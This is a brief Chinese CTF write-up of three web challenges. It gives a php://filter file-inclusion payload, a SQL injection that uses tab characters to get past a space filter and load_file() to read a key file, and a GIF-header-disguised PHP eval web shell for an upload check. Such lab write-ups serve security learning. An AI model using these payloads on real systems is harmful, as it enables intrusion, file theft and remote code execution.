week 6 for cnas writeup · Uknow - Stay hungry Stay foolish

文件包含 10

题目链接

http://47.100.121.220:28001/01.php

解答

这个题目又是一个文件包含的题目，这里直接用

1	file=php://filter/read=convert.base64-encode/resource=./key.php

SQL注入 10

题目链接

http://47.100.121.220:28001/02.php

解答

这个题目是一个注入题，经过测试可以知道过滤了空格，这里可以用%09进行绕过

http://47.100.121.220:28002/02.php?id=1')%09order%09by%091%23 		返回正常

http://47.100.121.220:28002/02.php?id=1')%09order%09by%092%23		返回正常

http://47.100.121.220:28002/02.php?id=1')%09order%09by%093%23		返回异常

得到字段数为2

提示key在/tmp/360/key中

然后用load_file()函数读取文件

1	http://47.100.121.220:28002/02.php?id=0%27%29%09union%09select%091,load_file('/tmp/360/key')%23

由于数据读取的问题，把id的值改为不存在的值即可读到key

文件上传 10

题目链接

http://47.100.121.220:28003/03.php

解答

这个上传题是检验文件头的，所以直接在php文件加上图片的文件头即可上传成功

1 2	GIF89a <?php @eval($_POST['c']);?>

菜刀连接即可。